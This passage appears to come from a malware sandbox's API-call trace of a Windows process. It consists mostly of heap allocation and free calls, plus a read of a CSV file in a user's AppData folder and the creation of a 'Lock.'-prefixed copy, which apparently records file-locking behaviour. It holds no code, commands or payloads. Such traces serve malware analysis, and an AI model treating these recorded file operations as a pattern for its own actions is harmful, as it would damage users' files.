out: hHeap=0x25c0000) returned 1 [0206.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.475] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0206.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0206.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0206.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0206.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0206.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0206.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0206.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0206.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0206.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0206.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0206.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0206.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0206.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0206.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0206.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0206.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0206.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0206.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0206.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.479] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.479] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.479] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.479] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.480] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/qtQYu5s9c3vFJHOzQ.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qtqyu5s9c3vfjhozq.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0206.480] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.480] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0206.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0206.480] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.480] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.480] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0206.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.481] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.qtQYu5s9c3vFJHOzQ.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.qtqyu5s9c3vfjhozq.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0206.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0206.482] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0206.482] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.482] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0206.482] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0206.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0206.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.482] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0206.482] ReadFile (in: hFile=0x1f8, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x7e14, lpOverlapped=0x0) returned 1 [0206.484] ReadFile (in: hFile=0x1f8, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0206.484] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0206.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7e14) returned 0x34a2048 [0206.485] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0206.485] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0206.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0206.485] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0206.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0206.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0206.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0206.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0206.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7e14) returned 0x34a2048 [0206.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0206.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0206.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0206.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18b8 [0206.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0206.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0206.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0206.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0206.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0206.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7e14) returned 0x24b7a48 [0206.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0206.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0206.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0206.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0206.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0206.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0206.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0206.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0206.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0206.488] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0206.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.489] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0206.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0206.489] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.489] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0206.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0206.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0206.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0206.490] 